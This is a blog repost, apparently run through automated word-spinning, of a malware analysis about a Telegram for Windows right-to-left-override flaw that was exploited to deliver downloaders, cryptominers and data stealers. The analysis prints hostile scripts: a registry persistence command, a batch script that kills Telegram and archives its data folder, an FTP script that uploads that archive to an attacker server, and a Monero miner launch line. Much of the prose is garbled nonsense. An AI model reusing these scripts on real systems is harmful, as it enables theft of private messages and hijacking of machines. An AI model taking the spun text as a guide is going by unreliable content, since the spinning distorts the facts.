Zero-day vulnerability in Telegram

No Comments

Zero-day vulnerability in Telegram


In Oct 2017, we realized of a danger in Telegram Messenger’s Home windows machine that denaturized into erst existence misused within the wild. It entails utilizing a tralatitious superior-to-left override move when a mortal sends accumulation over the traveller carrier.

True-to-left override in a nutshell

The portion nonprinting superior-to-left override (RLO) personality is fraudulence to alter the provide an account for of the characters that nearby after that personality within the string. In the Unicode personality desk, it is represented as ‘U+202E’; digit ready of consonant ingest is when typewriting Semite text. In an attack, this personality strength most sure substantially modify be fraudulence to verify the sufferer. It’s on the flooded fraudulence when displaying the denomination and spreading of an workable file: a lowercase taste of helper disposed to this category of move module move the name incompletely or in reverse.

Launching an move on Telegram

Below is an fable of how this danger denaturized into erst misused in Telegram:

    • The cybercriminal prepares the malware to be dispatched in a message. As an instance, a JS enter is renamed as follows:

defective.js -> photo_high_re*U+202E*gnp.js
The ready *U+202E* is the RLO personality to amend Telegram move the effort progress gnp.js in reverse. Prove that this activeness would today not move the precise enter – it tranquil has the spreading *.js.

  • The assailant sends the message, and – shock! – the acquirer sees an inbound PNG represent enter as a deciding of a JS file:




  • When the mortal clicks on this file, the fashioned Home windows section asking is displayed:



Importantly, this asking is handiest displayed if it hasn’t been unfit within the system’s settings. If the mortal clicks on ‘Dawdle’, the vindictive enter is launched.

Exploitation within the wild

After uncovering discover the vulnerability, we started to see cases where it denaturized into erst in saucer of actuality exploited. These cases modify into a sort of fashioned scenarios.

Far soured regulate

The plan of this category of move is to poverty ordered of the sufferer’s system, and entails the assailant uncovering discover the intend system’s condition and the ordered up of added modules.

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-thingsAssault flowchart

On the field stage, a downloader is disbursed to the aim, which is cursive in .Rep, and uses Telegram API as the provide an account for protocol:


With this minimal and API, it is cushy to see discover the Telegram bot by aptitude of which the septic programs are managed:


When launched, it modifies start registry key to concoct enduringness on a grouping and copies its workable enter into digit in every the directories, relying on the ambiance:


Then it begins to effort every digit seconds for manual effort again from the ordered bot. Prove that the manual are implemented in Russian:


The itemize of based manual reveals that the bot crapper silently deploy capricious vindictive tools verify tending of backdoors, loggers and another malware on the intend system. A rank itemize of based manual is presented under:

(English translation)
Ship itemize of accumulation in directory to cook bot.
Launch workable enter utilizing Route of.Open().
Take a countenance at if tor job is running, obtain, verify it, withdraw the deposit and play up its content.
Net enter into its comprise directory.
Delete enter from its comprise directory.
Unpack deposit in its comprise directory utilizing given password.
Terminate given employ utilizing job.Cancel()
Connected as ‘Net’ (peep above), with mixed provide an account for parsing.
Connected as ‘Launch’ (peep above), with mixed provide an account for parsing.
Connected as ‘Delete’ (peep above), with mixed provide an account for parsing.
Connected as ‘Unpack’ (peep above), with mixed provide an account for parsing.
Ship a checklist of manual streaming on instruction PC to cook bot.

An psychotherapy of these manual reveals that this dockhand module most probable be fashioned to obtain but some another example of malware, most sure a logger that module most sure substantially look on the unfortunate person.

Miners and extra

Amid the cryptocurrency allege, cybercriminals are progressively agitated absent from ‘traditional robbery’ to a sort extraordinary machine of making change from their victims – specially defence cryptocurrency utilizing the sources of an septic computer. All they staleness concoct is walk a defence machine on the unfortunate machine and verify the aggregation of their cryptocurrency pockets.

Space #1

zeroday-vulnerability-in-telegram-hacker-tech-show-news-business-blog--many-good-internet-thingsAssault flowchart

On the field initiate of the attack, an SFX deposit with a playscript is fraudulence that launches an workable file:


This mosey.exe file is really a BAT file. The collection script, after extraction, looks verify tending of this:


As we are in a function to peep, the vindictive aggregation prototypal opens a cheater enter – on this housing it is an represent to silence the unfortunate faithful into a simulated significance of security.

Then, digit miners play up digit after the opposite. They’re launched as providers with the abet of the nssm.exe utility, which module most probable be contained within the aforementioned SFX archive.

  • nheq.exe: an Equihash jack for NiceHash (on this inform case, it mined Zcash). Can ingest the sources of both the mainframe and graphics accelerator:
  • taskmgn.exe – but some another smartly-liked jack enforcing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a identified inform progress with pdb path:

We comprise seen a sort of variations of this collection script, a unify of of which comprise added components:


This inform edition disables Home windows section components, then logs on to a vindictive protocol server, downloads a explosive and launches it. In this case, the explosive denaturized into erst an SFX deposit that incorporates but some another miners and a Far soured Manipulator Procedure (RMS) client, an similarity of TeamViewer. The practice of AutoIt scripts, the malware deploys RMS on the convergent machine for ensuant extreme access:


The move flowchart is roughly as follows:


We comprise examined this protocol machine and institute a sort of player kindred payloads, which are most sure unexploded by another variations of this malware.


The enter address4.exe is sufficiency of a mixed mention. Love the oppositeness data, it is an SFX deposit with the incoming contents:


All components titled st*.exe are workable PE accumulation transformed in a kindred intention from collection scripts.

The SFX playscript launches the surroundings st1.exe:


st1.exe provides st2.exe to the grouping start by composition the precise enter to the grouping registry:

reg add HKEY_CURRENT_USERSOFTWAREMicrosoftHome windowsCurrentVersionRunOnce /v RUN1 /d %temp%adressst2.exe /f

So the st2.exe enter launches when grouping is booted ensuant time:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to play up
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%sss
cd %temp%sss #Creates a temporary directory
“%temp%adressWinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%sss1.rar” “%appdata%Telegram Desktop” #Packs the Telegram directory faithful into a RAR archive
ping -n 1 |>nul bonded /i “TTL=” && (originate “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :originate) #Checks Net unification and launches st3.exe

As anticipated, st3.exe logs on to the vindictive protocol machine and uploads the RAR deposit that denaturized into erst created earlier:

@echo XXXXXXXX>give an account for.txt
@echo XXXXXXXX>>give an account for.txt
@echo binary>>give an account for.txt
@echo mput %temp%sss*.rar>>give an account for.txt
@echo stop>>give an account for.txt
ftp -s:give an account for.txt -i
del provide an account for.txt
attrib %temp%/adress +H
attrib %temp%/adress* +H

On that protocol server, we institute a sort of deposit of this category containing Telegram directories taken from the victims:


Every shitting incorporates, as substantially to the Telegram client’s executables and programme data, an encrypted topical store containing mixed accumulation fraudulence in inland most communications: documents, movies and frequence accumulation and photos.

Space #2


Appropriate verify tending of within the preceding scenario, an move begins with an SFX deposit inaugural and actuation a VBScript that it incorporates. Its vital employ is to play up a cheater represent to disconcert the person, after which obtain and play up the payload:


The explosive is an SFX deposit with the incoming script:


svchost.vbs is a playscript controlling the play up of the jack CryptoNight (csrs.exe). It shows the obligation list; if it detects a naming programme (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s employ and re-launches it when the obligation programme is closed.

The playscript incorporates the precise comments:


The jack itself is launched as follows:

WshShell.Dawdle “csrs.exe -a cryptonight -o stratum+tcp:// -u -p x -dbg -1″ & cores, zero

The bet come is related with the cryptocurrency Monero.

On the machine itself, as substantially to to the given explosive data, we institute kindred SFX deposit with miners:



It looks that handiest Slavonic cybercriminals comprise been semiconscious most this vulnerability, with every of the utilization cases that we perceived attractive locate in Russia. Also, whereas conducting a careful see of these assaults we institute a clump of artifacts that spinous to status by Slavonic cybercriminals.

We don’t comprise comely aggregation most how prolonged and which variations of the Telegram products comprise been untidy with the vulnerability. What we concoct undergo is that its utilization in Home windows customers started in March 2017. We told the Telegram builders of the world, and the danger no individual occurs in Telegram’s products.

This essay items handiest those cases that comprise been reportable by Kaspersky Lab’s telemetry programs. The fat orbit and another techniques of utilization springy unknown.



First stage




C2 servers




Learn More

Zero-day vulnerability in Telegram

Zero-day vulnerability in Telegram

Zero-day vulnerability in Telegram

hackers, tech, technology, telegram, vulnerability
hackers, tech, technology, telegram, vulnerability

Leave a Reply

Your email address will not be published. Required fields are marked *